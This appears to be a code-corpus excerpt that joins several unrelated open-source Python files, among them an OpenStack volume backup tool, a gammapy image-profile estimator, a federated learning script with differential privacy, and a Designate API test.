generate_Initial_Parameters(x_labels, stderr_bottom, neg_exponential) popt_b, pcov = curve_fit(neg_exponential, x_labels, stderr_bottom, geneticParameters_bottom, maxfev=10000) plt.fill_between(x_labels, exponential(x_labels, *popt_t), neg_exponential(x_labels, *popt_b), facecolor='blue', alpha=0.6) top_curve = exponential(x_labels, *popt_t) bottom_curve = neg_exponential(x_labels, *popt_b) else: pass except: pass ax.set_axisbelow(True) plt.minorticks_on() plt.grid(which='minor', axis='y', color='white', linestyle='--', alpha=0.3) ax.yaxis.grid(True, linestyle='-', linewidth='1', which='major', color='white') ax.xaxis.grid(True, linestyle='-', linewidth='1', which='major', color='white', alpha=0.5) ax.tick_params(axis='x', which='minor', bottom=False) ax.set_facecolor('gainsboro') plt.plot(x_labels, y_fluidity_values, ls='--', lw=1, color='black') # plot y-values of fluidity plt.xticks(np.arange(x_labels[0], x_labels[len(x_labels)-1]+1, 1.0)) # make sure x interval is 1 plt.xlim(x_labels[0], x_labels[len(x_labels)-1]) # adjust x limit so it starts with 3 at 0 max_y = max(stderr_top) min_y = min(stderr_bottom) plt.ylim((min_y - min_y*0.15), (max_y + max_y*0.15)) plt.xlabel('Number of genomes sampled') plt.ylabel('Fluidity, '+u'\u03C6') plt.tight_layout() plt.savefig(figure_output) with open(results_output, 'w') as results: # print out fluidity results results.write('Genomes_Sampled\tFluidity\tTotal_Variance\tTotal_Stderr\tExponential_top\tExponential_bottom\n') r_out = [] for i in range(0, iso_num-2): r_out.append([str(i+3), str(pan_fluidity), str(total_variance[i]), str(total_stderr[i]), str(top_curve[i]), str(bottom_curve[i])]) for line in r_out: results.write('\t'.join(line) + '\n') if __name__ == "__main__": ortho_dict = create_ortho_dictionary(input_file) iso_num = max([len(v) for v in ortho_dict.values()]) iso_list = list(set(itertools.chain.from_iterable([v for v in ortho_dict.values() if len(v) == iso_num]))) pair_dict = create_pair_dictionary(ortho_dict) pan_results = compute_fluidity_all_genomes() pan_fluidity = pan_results[0] pan_variance = pan_results[1] permutation_list = [] sub_fluid_dict = genome_subsamples_fluidities(permutation_list) create_fluidity_results(fluid_fig, fluid_results)
2.671875
3
osvolbackup/backup.py
CCSGroupInternational/osvolbackup
1
5514
# # This module provides the Instance class that encapsulate some complex server instances related operations # from __future__ import print_function from json import loads from neutronclient.v2_0 import client as neutron_client from novaclient import client as nova_client from cinderclient import client as cinder_client from osvolbackup.server import ServerInstance, ServerNotFound from osvolbackup.osauth import get_session, VERSION from osvolbackup.verbose import vprint from time import time, sleep class BackupGroup(object): max_secs_gbi = 300 poll_delay = 10 def __init__(self, serverName): self.selected_metadata = None self.selected_backups = [] self.selected_volumes = [] session = self.session = get_session() self.neutron = neutron_client.Client(session=session) self.nova = nova_client.Client(VERSION, session=session) self.cinder = cinder_client.Client(VERSION, session=session) try: server = ServerInstance(serverName) except ServerNotFound: name = 'osvb_'+serverName else: name = 'osvb_'+server.instance.id self.backup_list = self.cinder.backups.list(search_opts={"name": name}) self.volume_map = {} if len(self.backup_list) == 0: raise BackupNotFound(serverName) # Load metadata from the backup description field self.backup_meta_data = backup_meta_data = {} for backup in self.backup_list: meta_data = loads(backup.description) backup_meta_data[backup.id] = meta_data self.volume_map[backup.id] = {"id": backup.volume_id, "size": backup.size} self.available_backups = sorted(set([b['backup_time'] for b in backup_meta_data.values()])) def select_by_tag(self, tag): if tag == 'last': selected_backup_timestamp = self.available_backups[-1] else: raise BackupTooMany(tag) # Get volumes associated with the selected backup for backup_id, backup_meta in self.backup_meta_data.iteritems(): if backup_meta['backup_time'] == selected_backup_timestamp: self.selected_backups.append(backup_id) self.selected_volumes.append(self.volume_map[backup_id]) self.selected_metadata = backup_meta def get_volumes(self): return self.selected_volumes def restore(self, server=None, network=None, to_project=None, skip_vm=False): # flavor = self.nova.flavors.find(name=self.selected_metadata['flavor']) new_volume_list = self._create_volumes(self.selected_volumes, to_project) # Restore the volumes block_device_mapping = {} for i, backup_id in enumerate(self.selected_backups): vol_index = self.backup_meta_data[backup_id]['vol_index'] new_volume_id = new_volume_list[i].id vprint("Restoring from backup", backup_id, "to volume", new_volume_id) dev_name = "vd" + chr(ord('a') + vol_index) block_device_mapping[dev_name] = new_volume_id restore = self.cinder.restores.restore(backup_id=backup_id, volume_id=new_volume_id) restored_volume = self.cinder.volumes.get(restore.volume_id) self._wait_for(restored_volume, ('restoring-backup',), 'available') # We need to get again to refresh the metadata restored_volume = self.cinder.volumes.get(restore.volume_id) if vol_index == 0: if not skip_vm: name = restored_volume.metadata['osvb_name'] flavor = restored_volume.metadata['osvb_flavor'] flavor = self.nova.flavors.find(name=flavor) # name to id saved_networks = loads(restored_volume.metadata['osvb_network']) if not skip_vm: nics = [] if network is not None: net_name, net_ip = network.split("=") net_id = self.neutron.list_networks(name=net_name)['networks'][0]['id'] nic_info = {'net-id': net_id, 'v4-fixed-ip': net_ip} nics.append(nic_info) else: for network_name, network_ips in saved_networks.iteritems(): nic_info = {} nic_info['net-id'] = self.neutron.list_networks(name=network_name)['networks'][0]['id'] nic_info['v4-fixed-ip'] = network_ips[0] nics.append(nic_info) target_session = get_session(to_project) target_nova = nova_client.Client(VERSION, session=target_session) server = target_nova.servers.create( name=name, image=None, flavor=flavor, block_device_mapping=block_device_mapping, nics=nics ) print("Server was restored into instance", server.id) def _create_volumes(self, volume_list, to_project): """ Create volumes based """ vprint("Creating volumes for the instance restore") target_session = get_session(to_project) target_cinder = cinder_client.Client(VERSION, session=target_session) vol_list = [] for volume in volume_list: vprint("Creating %dG volume" % volume['size']) new_volume = target_cinder.volumes.create(volume['size']) self._wait_for(new_volume, ('creating',), 'available') vol_list.append(new_volume) return vol_list # Borrowed from https://github.com/Akrog/cinderback/blob/master/cinderback.py def _wait_for(self, resource, allowed_states, expected_states=None, timeout=None): """Waits for a resource to come to a specific state. :param resource: Resource we want to wait for :param allowed_states: iterator with allowed intermediary states :param expected_states: states we expect to have at the end, if None is supplied then anything is good. :param need_up: If wee need backup service to be up and running :return: The most updated resource """ if timeout: deadline = time() + timeout else: deadline = time() + (self.max_secs_gbi * resource.size) while resource.status in allowed_states: sleep(self.poll_delay) if deadline <= time(): raise TimeoutError(what=resource) resource = resource.manager.get(resource.id) if expected_states and resource.status not in expected_states: raise UnexpectedStatus(what=resource, intermediate=allowed_states, final=expected_states) return resource class BackupException(Exception): def __init__(self, what, *args, **kwargs): super(BackupException, self).__init__(*args, **kwargs) self.what = what def __str__(self): return u'%s: %s' % (self.__class__.__name__, self.what) class UnexpectedStatus(BackupException): def __init__(self, what, intermediate='', final='', *args, **kwargs): super(UnexpectedStatus, self).__init__(what, *args, **kwargs) self.intermediate = intermediate self.final = final def __str__(self): if self.intermediate or self.final: steps = (' [intermediate: %s, final: %s]' % (self.intermediate, self.final)) else: steps = '' return (u'%s: Status is %s%s' % (self.__class__.__name__, self.what.status, steps)) class BackupNotFound(BackupException): pass class BackupTooMany(BackupException): pass
2.25
2
gammapy/estimators/profile.py
JohannesBuchner/gammapy
1
5515
# Licensed under a 3-clause BSD style license - see LICENSE.rst """Tools to create profiles (i.e. 1D "slices" from 2D images).""" import numpy as np import scipy.ndimage from astropy import units as u from astropy.convolution import Box1DKernel, Gaussian1DKernel from astropy.coordinates import Angle from astropy.table import Table from .core import Estimator __all__ = ["ImageProfile", "ImageProfileEstimator"] # TODO: implement measuring profile along arbitrary directions # TODO: think better about error handling. e.g. MC based methods class ImageProfileEstimator(Estimator): """Estimate profile from image. Parameters ---------- x_edges : `~astropy.coordinates.Angle` Coordinate edges to define a custom measument grid (optional). method : ['sum', 'mean'] Compute sum or mean within profile bins. axis : ['lon', 'lat', 'radial'] Along which axis to estimate the profile. center : `~astropy.coordinates.SkyCoord` Center coordinate for the radial profile option. Examples -------- This example shows how to compute a counts profile for the Fermi galactic center region:: import matplotlib.pyplot as plt from gammapy.maps import ImageProfileEstimator from gammapy.maps import Map from astropy import units as u # load example data filename = '$GAMMAPY_DATA/fermi-3fhl-gc/fermi-3fhl-gc-counts.fits.gz' fermi_cts = Map.read(filename) # set up profile estimator and run p = ImageProfileEstimator(axis='lon', method='sum') profile = p.run(fermi_cts) # smooth profile and plot smoothed = profile.smooth(kernel='gauss') smoothed.peek() plt.show() """ tag = "ImageProfileEstimator" def __init__(self, x_edges=None, method="sum", axis="lon", center=None): self._x_edges = x_edges if method not in ["sum", "mean"]: raise ValueError("Not a valid method, choose either 'sum' or 'mean'") if axis not in ["lon", "lat", "radial"]: raise ValueError("Not a valid axis, choose either 'lon' or 'lat'") if method == "radial" and center is None: raise ValueError("Please provide center coordinate for radial profiles") self.parameters = {"method": method, "axis": axis, "center": center} def _get_x_edges(self, image): if self._x_edges is not None: return self._x_edges p = self.parameters coordinates = image.geom.get_coord(mode="edges").skycoord if p["axis"] == "lat": x_edges = coordinates[:, 0].data.lat elif p["axis"] == "lon": lon = coordinates[0, :].data.lon x_edges = lon.wrap_at("180d") elif p["axis"] == "radial": rad_step = image.geom.pixel_scales.mean() corners = [0, 0, -1, -1], [0, -1, 0, -1] rad_max = coordinates[corners].separation(p["center"]).max() x_edges = Angle(np.arange(0, rad_max.deg, rad_step.deg), unit="deg") return x_edges def _estimate_profile(self, image, image_err, mask): p = self.parameters labels = self._label_image(image, mask) profile_err = None index = np.arange(1, len(self._get_x_edges(image))) if p["method"] == "sum": profile = scipy.ndimage.sum(image.data, labels.data, index) if image.unit.is_equivalent("counts"): profile_err = np.sqrt(profile) elif image_err: # gaussian error propagation err_sum = scipy.ndimage.sum(image_err.data ** 2, labels.data, index) profile_err = np.sqrt(err_sum) elif p["method"] == "mean": # gaussian error propagation profile = scipy.ndimage.mean(image.data, labels.data, index) if image_err: N = scipy.ndimage.sum(~np.isnan(image_err.data), labels.data, index) err_sum = scipy.ndimage.sum(image_err.data ** 2, labels.data, index) profile_err = np.sqrt(err_sum) / N return profile, profile_err def _label_image(self, image, mask=None): p = self.parameters coordinates = image.geom.get_coord().skycoord x_edges = self._get_x_edges(image) if p["axis"] == "lon": lon = coordinates.data.lon.wrap_at("180d") data = np.digitize(lon.degree, x_edges.deg) elif p["axis"] == "lat": lat = coordinates.data.lat data = np.digitize(lat.degree, x_edges.deg) elif p["axis"] == "radial": separation = coordinates.separation(p["center"]) data = np.digitize(separation.degree, x_edges.deg) if mask is not None: # assign masked values to background data[mask.data] = 0 return image.copy(data=data) def run(self, image, image_err=None, mask=None): """Run image profile estimator. Parameters ---------- image : `~gammapy.maps.Map` Input image to run profile estimator on. image_err : `~gammapy.maps.Map` Input error image to run profile estimator on. mask : `~gammapy.maps.Map` Optional mask to exclude regions from the measurement. Returns ------- profile : `ImageProfile` Result image profile object. """ p = self.parameters if image.unit.is_equivalent("count"): image_err = image.copy(data=np.sqrt(image.data)) profile, profile_err = self._estimate_profile(image, image_err, mask) result = Table() x_edges = self._get_x_edges(image) result["x_min"] = x_edges[:-1] result["x_max"] = x_edges[1:] result["x_ref"] = (x_edges[:-1] + x_edges[1:]) / 2 result["profile"] = profile * image.unit if profile_err is not None: result["profile_err"] = profile_err * image.unit result.meta["PROFILE_TYPE"] = p["axis"] return ImageProfile(result) class ImageProfile: """Image profile class. The image profile data is stored in `~astropy.table.Table` object, with the following columns: * `x_ref` Coordinate bin center (required). * `x_min` Coordinate bin minimum (optional). * `x_max` Coordinate bin maximum (optional). * `profile` Image profile data (required). * `profile_err` Image profile data error (optional). Parameters ---------- table : `~astropy.table.Table` Table instance with the columns specified as above. """ def __init__(self, table): self.table = table def smooth(self, kernel="box", radius="0.1 deg", **kwargs): r"""Smooth profile with error propagation. Smoothing is described by a convolution: .. math:: x_j = \sum_i x_{(j - i)} h_i Where :math:`h_i` are the coefficients of the convolution kernel. The corresponding error on :math:`x_j` is then estimated using Gaussian error propagation, neglecting correlations between the individual :math:`x_{(j - i)}`: .. math:: \Delta x_j = \sqrt{\sum_i \Delta x^{2}_{(j - i)} h^{2}_i} Parameters ---------- kernel : {'gauss', 'box'} Kernel shape radius : `~astropy.units.Quantity`, str or float Smoothing width given as quantity or float. If a float is given it is interpreted as smoothing width in pixels. If an (angular) quantity is given it is converted to pixels using `xref[1] - x_ref[0]`. kwargs : dict Keyword arguments passed to `~scipy.ndimage.uniform_filter` ('box') and `~scipy.ndimage.gaussian_filter` ('gauss'). Returns ------- profile : `ImageProfile` Smoothed image profile. """ table = self.table.copy() profile = table["profile"] radius = u.Quantity(radius) radius = np.abs(radius / np.diff(self.x_ref))[0] width = 2 * radius.value + 1 if kernel == "box": smoothed = scipy.ndimage.uniform_filter( profile.astype("float"), width, **kwargs ) # renormalize data if table["profile"].unit.is_equivalent("count"): smoothed *= int(width) smoothed_err = np.sqrt(smoothed) elif "profile_err" in table.colnames: profile_err = table["profile_err"] # use gaussian error propagation box = Box1DKernel(width) err_sum = scipy.ndimage.convolve(profile_err ** 2, box.array ** 2) smoothed_err = np.sqrt(err_sum) elif kernel == "gauss": smoothed = scipy.ndimage.gaussian_filter( profile.astype("float"), width, **kwargs ) # use gaussian error propagation if "profile_err" in table.colnames: profile_err = table["profile_err"] gauss = Gaussian1DKernel(width) err_sum = scipy.ndimage.convolve(profile_err ** 2, gauss.array ** 2) smoothed_err = np.sqrt(err_sum) else: raise ValueError("Not valid kernel choose either 'box' or 'gauss'") table["profile"] = smoothed * self.table["profile"].unit if "profile_err" in table.colnames: table["profile_err"] = smoothed_err * self.table["profile"].unit return self.__class__(table) def plot(self, ax=None, **kwargs): """Plot image profile. Parameters ---------- ax : `~matplotlib.axes.Axes` Axes object **kwargs : dict Keyword arguments passed to `~matplotlib.axes.Axes.plot` Returns ------- ax : `~matplotlib.axes.Axes` Axes object """ import matplotlib.pyplot as plt if ax is None: ax = plt.gca() y = self.table["profile"].data x = self.x_ref.value ax.plot(x, y, **kwargs) ax.set_xlabel("lon") ax.set_ylabel("profile") ax.set_xlim(x.max(), x.min()) return ax def plot_err(self, ax=None, **kwargs): """Plot image profile error as band. Parameters ---------- ax : `~matplotlib.axes.Axes` Axes object **kwargs : dict Keyword arguments passed to plt.fill_between() Returns ------- ax : `~matplotlib.axes.Axes` Axes object """ import matplotlib.pyplot as plt if ax is None: ax = plt.gca() y = self.table["profile"].data ymin = y - self.table["profile_err"].data ymax = y + self.table["profile_err"].data x = self.x_ref.value # plotting defaults kwargs.setdefault("alpha", 0.5) ax.fill_between(x, ymin, ymax, **kwargs) ax.set_xlabel("x (deg)") ax.set_ylabel("profile") return ax @property def x_ref(self): """Reference x coordinates.""" return self.table["x_ref"].quantity @property def x_min(self): """Min. x coordinates.""" return self.table["x_min"].quantity @property def x_max(self): """Max. x coordinates.""" return self.table["x_max"].quantity @property def profile(self): """Image profile quantity.""" return self.table["profile"].quantity @property def profile_err(self): """Image profile error quantity.""" try: return self.table["profile_err"].quantity except KeyError: return None def peek(self, figsize=(8, 4.5), **kwargs): """Show image profile and error. Parameters ---------- **kwargs : dict Keyword arguments passed to `ImageProfile.plot_profile()` Returns ------- ax : `~matplotlib.axes.Axes` Axes object """ import matplotlib.pyplot as plt fig = plt.figure(figsize=figsize) ax = fig.add_axes([0.1, 0.1, 0.8, 0.8]) ax = self.plot(ax, **kwargs) if "profile_err" in self.table.colnames: ax = self.plot_err(ax, color=kwargs.get("c")) return ax def normalize(self, mode="peak"): """Normalize profile to peak value or integral. Parameters ---------- mode : ['integral', 'peak'] Normalize image profile so that it integrates to unity ('integral') or the maximum value corresponds to one ('peak'). Returns ------- profile : `ImageProfile` Normalized image profile. """ table = self.table.copy() profile = self.table["profile"] if mode == "peak": norm = np.nanmax(profile) elif mode == "integral": norm = np.nansum(profile) else: raise ValueError(f"Invalid normalization mode: {mode!r}") table["profile"] /= norm if "profile_err" in table.colnames: table["profile_err"] /= norm return self.__class__(table)
2.578125
3
ABC/abc001-abc050/abc007/b.py
KATO-Hiro/AtCoder
2
5516
<reponame>KATO-Hiro/AtCoder # -*- coding: utf-8 -*- def main(): a = input() # See: # https://www.slideshare.net/chokudai/abc007 if a == 'a': print('-1') else: print('a') if __name__ == '__main__': main()
3.65625
4
env/lib/python3.8/site-packages/versatileimagefield/mixins.py
crimergio/linux_test
1
5517
"""versatileimagefield Field mixins.""" import os import re from .datastructures import FilterLibrary from .registry import autodiscover, versatileimagefield_registry from .settings import ( cache, VERSATILEIMAGEFIELD_CREATE_ON_DEMAND, VERSATILEIMAGEFIELD_SIZED_DIRNAME, VERSATILEIMAGEFIELD_FILTERED_DIRNAME ) from .validators import validate_ppoi autodiscover() filter_regex_snippet = r'__({registered_filters})__'.format( registered_filters='|'.join([ key for key, filter_cls in versatileimagefield_registry._filter_registry.items() ]) ) sizer_regex_snippet = r'-({registered_sizers})-(\d+)x(\d+)(?:-\d+)?'.format( registered_sizers='|'.join([ sizer_cls.get_filename_key_regex() for key, sizer_cls in versatileimagefield_registry._sizedimage_registry.items() ]) ) filter_regex = re.compile(filter_regex_snippet + '$') sizer_regex = re.compile(sizer_regex_snippet + '$') filter_and_sizer_regex = re.compile( filter_regex_snippet + sizer_regex_snippet + '$' ) class VersatileImageMixIn(object): """A mix-in that provides the filtering/sizing API.""" def __init__(self, *args, **kwargs): """Construct PPOI and create_on_demand.""" self._create_on_demand = VERSATILEIMAGEFIELD_CREATE_ON_DEMAND super(VersatileImageMixIn, self).__init__(*args, **kwargs) # Setting initial ppoi if self.field.ppoi_field: instance_ppoi_value = getattr( self.instance, self.field.ppoi_field, (0.5, 0.5) ) self.ppoi = instance_ppoi_value else: self.ppoi = (0.5, 0.5) @property def url(self): """ Return the appropriate URL. URL is constructed based on these field conditions: * If empty (not `self.name`) and a placeholder is defined, the URL to the placeholder is returned. * Otherwise, defaults to vanilla ImageFieldFile behavior. """ if not self.name and self.field.placeholder_image_name: return self.storage.url(self.field.placeholder_image_name) return super(VersatileImageMixIn, self).url @property def create_on_demand(self): """create_on_demand getter.""" return self._create_on_demand @create_on_demand.setter def create_on_demand(self, value): if not isinstance(value, bool): raise ValueError( "`create_on_demand` must be a boolean" ) else: self._create_on_demand = value self.build_filters_and_sizers(self.ppoi, value) @property def ppoi(self): """Primary Point of Interest (ppoi) getter.""" return self._ppoi_value @ppoi.setter def ppoi(self, value): """Primary Point of Interest (ppoi) setter.""" ppoi = validate_ppoi( value, return_converted_tuple=True ) if ppoi is not False: self._ppoi_value = ppoi self.build_filters_and_sizers(ppoi, self.create_on_demand) def build_filters_and_sizers(self, ppoi_value, create_on_demand): """Build the filters and sizers for a field.""" name = self.name if not name and self.field.placeholder_image_name: name = self.field.placeholder_image_name self.filters = FilterLibrary( name, self.storage, versatileimagefield_registry, ppoi_value, create_on_demand ) for ( attr_name, sizedimage_cls ) in versatileimagefield_registry._sizedimage_registry.items(): setattr( self, attr_name, sizedimage_cls( path_to_image=name, storage=self.storage, create_on_demand=create_on_demand, ppoi=ppoi_value ) ) def get_filtered_root_folder(self): """Return the location where filtered images are stored.""" folder, filename = os.path.split(self.name) return os.path.join(folder, VERSATILEIMAGEFIELD_FILTERED_DIRNAME, '') def get_sized_root_folder(self): """Return the location where sized images are stored.""" folder, filename = os.path.split(self.name) return os.path.join(VERSATILEIMAGEFIELD_SIZED_DIRNAME, folder, '') def get_filtered_sized_root_folder(self): """Return the location where filtered + sized images are stored.""" sized_root_folder = self.get_sized_root_folder() return os.path.join( sized_root_folder, VERSATILEIMAGEFIELD_FILTERED_DIRNAME ) def delete_matching_files_from_storage(self, root_folder, regex): """ Delete files in `root_folder` which match `regex` before file ext. Example values: * root_folder = 'foo/' * self.name = 'bar.jpg' * regex = re.compile('-baz') Result: * foo/bar-baz.jpg <- Deleted * foo/bar-biz.jpg <- Not deleted """ if not self.name: # pragma: no cover return try: directory_list, file_list = self.storage.listdir(root_folder) except OSError: # pragma: no cover pass else: folder, filename = os.path.split(self.name) basename, ext = os.path.splitext(filename) for f in file_list: if not f.startswith(basename) or not f.endswith(ext): # pragma: no cover continue tag = f[len(basename):-len(ext)] assert f == basename + tag + ext if regex.match(tag) is not None: file_location = os.path.join(root_folder, f) self.storage.delete(file_location) cache.delete( self.storage.url(file_location) ) print( "Deleted {file} (created from: {original})".format( file=os.path.join(root_folder, f), original=self.name ) ) def delete_filtered_images(self): """Delete all filtered images created from `self.name`.""" self.delete_matching_files_from_storage( self.get_filtered_root_folder(), filter_regex ) def delete_sized_images(self): """Delete all sized images created from `self.name`.""" self.delete_matching_files_from_storage( self.get_sized_root_folder(), sizer_regex ) def delete_filtered_sized_images(self): """Delete all filtered sized images created from `self.name`.""" self.delete_matching_files_from_storage( self.get_filtered_sized_root_folder(), filter_and_sizer_regex ) def delete_all_created_images(self): """Delete all images created from `self.name`.""" self.delete_filtered_images() self.delete_sized_images() self.delete_filtered_sized_images()
1.992188
2
differential_privacy/run_federated.py
HanGuo97/federated
330
5518
# Copyright 2020, Google LLC. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Runs federated training with differential privacy on various tasks.""" import functools from absl import app from absl import flags from absl import logging import tensorflow as tf import tensorflow_federated as tff from utils import task_utils from utils import training_utils from utils import utils_impl from utils.optimizers import optimizer_utils with utils_impl.record_hparam_flags() as optimizer_flags: # Defining optimizer flags optimizer_utils.define_optimizer_flags('client') optimizer_utils.define_optimizer_flags('server') with utils_impl.record_hparam_flags() as shared_flags: # Federated training hyperparameters flags.DEFINE_integer('client_epochs_per_round', 1, 'Number of epochs in the client to take per round.') flags.DEFINE_integer('client_batch_size', 20, 'Batch size on the clients.') flags.DEFINE_integer('clients_per_round', 10, 'How many clients to sample per round.') flags.DEFINE_integer('client_datasets_random_seed', 1, 'Random seed for client sampling.') flags.DEFINE_integer( 'max_elements_per_client', None, 'Maximum number of ' 'elements for each training client. If set to None, all ' 'available examples are used.') # Training loop configuration flags.DEFINE_integer('total_rounds', 200, 'Number of total training rounds.') flags.DEFINE_string( 'experiment_name', None, 'The name of this experiment. Will be append to ' '--root_output_dir to separate experiment results.') flags.DEFINE_string('root_output_dir', '/tmp/fed_opt/', 'Root directory for writing experiment output.') flags.DEFINE_integer( 'rounds_per_eval', 1, 'How often to evaluate the global model on the validation dataset.') flags.DEFINE_integer( 'num_validation_examples', -1, 'The number of validation' 'examples to use. If set to -1, all available examples ' 'are used.') flags.DEFINE_integer('rounds_per_checkpoint', 50, 'How often to checkpoint the global model.') with utils_impl.record_hparam_flags() as dp_flags: # Differential privacy flags flags.DEFINE_float( 'clip', None, 'Clip value for fixed clipping or initial clip for ' 'adaptive clipping. If None, no clipping is used.') flags.DEFINE_float('noise_multiplier', None, 'Noise multiplier. If None, non-DP aggregator is used.') flags.DEFINE_float( 'adaptive_clip_learning_rate', None, 'Adaptive clip learning rate. If ' 'None, clip adaptation is not used.') flags.DEFINE_float('target_unclipped_quantile', 0.5, 'Target unclipped quantile.') flags.DEFINE_boolean('uniform_weighting', False, 'Whether to weigh clients uniformly.') # Task specification with utils_impl.record_hparam_flags() as task_flags: task_utils.define_task_flags() FLAGS = flags.FLAGS def _write_hparam_flags(): """Returns an ordered dictionary of pertinent hyperparameter flags.""" hparam_dict = utils_impl.lookup_flag_values(shared_flags) # Update with optimizer flags corresponding to the chosen optimizers. opt_flag_dict = utils_impl.lookup_flag_values(optimizer_flags) opt_flag_dict = optimizer_utils.remove_unused_flags('client', opt_flag_dict) opt_flag_dict = optimizer_utils.remove_unused_flags('server', opt_flag_dict) hparam_dict.update(opt_flag_dict) # Update with task flags task_flag_dict = utils_impl.lookup_flag_values(task_flags) hparam_dict.update(task_flag_dict) training_utils.write_hparams_to_csv(hparam_dict, FLAGS.root_output_dir, FLAGS.experiment_name) def main(argv): if len(argv) > 1: raise app.UsageError('Expected no command-line arguments, ' 'got: {}'.format(argv)) client_optimizer_fn = optimizer_utils.create_optimizer_fn_from_flags('client') server_optimizer_fn = optimizer_utils.create_optimizer_fn_from_flags('server') train_client_spec = tff.simulation.baselines.ClientSpec( num_epochs=FLAGS.client_epochs_per_round, batch_size=FLAGS.client_batch_size, max_elements=FLAGS.max_elements_per_client) task = task_utils.create_task_from_flags(train_client_spec) logging.info('Trainable weights:') for weight in task.model_fn().trainable_variables: logging.info('name: %s shape: %s', weight.name, weight.shape) if FLAGS.uniform_weighting: client_weighting = tff.learning.ClientWeighting.UNIFORM elif FLAGS.task == 'shakespeare_character' or FLAGS.task == 'stackoverflow_word': def client_weighting(local_outputs): return tf.cast(tf.squeeze(local_outputs['num_tokens']), tf.float32) else: client_weighting = None if FLAGS.noise_multiplier is None: if FLAGS.uniform_weighting: aggregation_factory = tff.aggregators.UnweightedMeanFactory() else: aggregation_factory = tff.aggregators.MeanFactory() if FLAGS.clip is not None: if FLAGS.clip <= 0: raise ValueError('clip must be positive if clipping is enabled.') if FLAGS.adaptive_clip_learning_rate is None: clip = FLAGS.clip else: if FLAGS.adaptive_clip_learning_rate <= 0: raise ValueError('adaptive_clip_learning_rate must be positive if ' 'adaptive clipping is enabled.') clip = tff.aggregators.PrivateQuantileEstimationProcess.no_noise( initial_estimate=FLAGS.clip, target_quantile=FLAGS.target_unclipped_quantile, learning_rate=FLAGS.adaptive_clip_learning_rate) aggregation_factory = tff.aggregators.clipping_factory( clip, aggregation_factory) else: if not FLAGS.uniform_weighting: raise ValueError( 'Differential privacy is only implemented for uniform weighting.') if FLAGS.noise_multiplier <= 0: raise ValueError('noise_multiplier must be positive if DP is enabled.') if FLAGS.clip is None or FLAGS.clip <= 0: raise ValueError('clip must be positive if DP is enabled.') if FLAGS.adaptive_clip_learning_rate is None: aggregation_factory = tff.aggregators.DifferentiallyPrivateFactory.gaussian_fixed( noise_multiplier=FLAGS.noise_multiplier, clients_per_round=FLAGS.clients_per_round, clip=FLAGS.clip) else: if FLAGS.adaptive_clip_learning_rate <= 0: raise ValueError('adaptive_clip_learning_rate must be positive if ' 'adaptive clipping is enabled.') aggregation_factory = tff.aggregators.DifferentiallyPrivateFactory.gaussian_adaptive( noise_multiplier=FLAGS.noise_multiplier, clients_per_round=FLAGS.clients_per_round, initial_l2_norm_clip=FLAGS.clip, target_unclipped_quantile=FLAGS.target_unclipped_quantile, learning_rate=FLAGS.adaptive_clip_learning_rate) iterative_process = tff.learning.build_federated_averaging_process( model_fn=task.model_fn, server_optimizer_fn=server_optimizer_fn, client_weighting=client_weighting, client_optimizer_fn=client_optimizer_fn, model_update_aggregation_factory=aggregation_factory) train_data = task.datasets.train_data.preprocess( task.datasets.train_preprocess_fn) training_process = ( tff.simulation.compose_dataset_computation_with_iterative_process( train_data.dataset_computation, iterative_process)) training_selection_fn = functools.partial( tff.simulation.build_uniform_sampling_fn( train_data.client_ids, random_seed=FLAGS.client_datasets_random_seed), size=FLAGS.clients_per_round) test_data = task.datasets.get_centralized_test_data() validation_data = test_data.take(FLAGS.num_validation_examples) federated_eval = tff.learning.build_federated_evaluation(task.model_fn) evaluation_selection_fn = lambda round_num: [validation_data] def evaluation_fn(state, evaluation_data): return federated_eval(state.model, evaluation_data) program_state_manager, metrics_managers = training_utils.create_managers( FLAGS.root_output_dir, FLAGS.experiment_name) _write_hparam_flags() state = tff.simulation.run_training_process( training_process=training_process, training_selection_fn=training_selection_fn, total_rounds=FLAGS.total_rounds, evaluation_fn=evaluation_fn, evaluation_selection_fn=evaluation_selection_fn, rounds_per_evaluation=FLAGS.rounds_per_eval, program_state_manager=program_state_manager, rounds_per_saving_program_state=FLAGS.rounds_per_checkpoint, metrics_managers=metrics_managers) test_metrics = federated_eval(state.model, [test_data]) for metrics_manager in metrics_managers: metrics_manager.release(test_metrics, FLAGS.total_rounds + 1) if __name__ == '__main__': app.run(main)
1.796875
2
waymo_kitti_converter/tools/visual_point_cloud.py
anhvth/Pseudo_Lidar_V2
0
5519
import open3d as o3d import numpy as np pc_load_pathname = '/home/caizhongang/github/waymo_kitti_converter/007283-000.bin' pc = np.fromfile(pc_load_pathname, dtype=np.float32).reshape(-1, 3) pcd = o3d.geometry.PointCloud() pcd.points = o3d.utility.Vector3dVector(pc) axis = o3d.geometry.TriangleMesh.create_coordinate_frame(size=1, origin=[0,0,0]) visual = [pcd, axis] o3d.visualization.draw_geometries(visual)
2.15625
2
designate-8.0.0/designate/tests/test_api/test_v2/test_limits.py
scottwedge/OpenStack-Stein
145
5520
<reponame>scottwedge/OpenStack-Stein # Copyright 2013 Hewlett-Packard Development Company, L.P. # # Author: <NAME> <<EMAIL>> # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from oslo_config import cfg from designate.tests.test_api.test_v2 import ApiV2TestCase class ApiV2LimitsTest(ApiV2TestCase): def test_get_limits(self): response = self.client.get('/limits/') self.assertEqual(200, response.status_int) self.assertEqual('application/json', response.content_type) self.assertIn('max_zones', response.json) self.assertIn('max_zone_records', response.json) self.assertIn('max_zone_recordsets', response.json) self.assertIn('max_recordset_records', response.json) self.assertIn('min_ttl', response.json) self.assertIn('max_zone_name_length', response.json) self.assertIn('max_recordset_name_length', response.json) self.assertIn('max_page_limit', response.json) absolutelimits = response.json self.assertEqual(cfg.CONF.quota_zones, absolutelimits['max_zones']) self.assertEqual(cfg.CONF.quota_zone_records, absolutelimits['max_zone_recordsets']) self.assertEqual(cfg.CONF['service:central'].min_ttl, 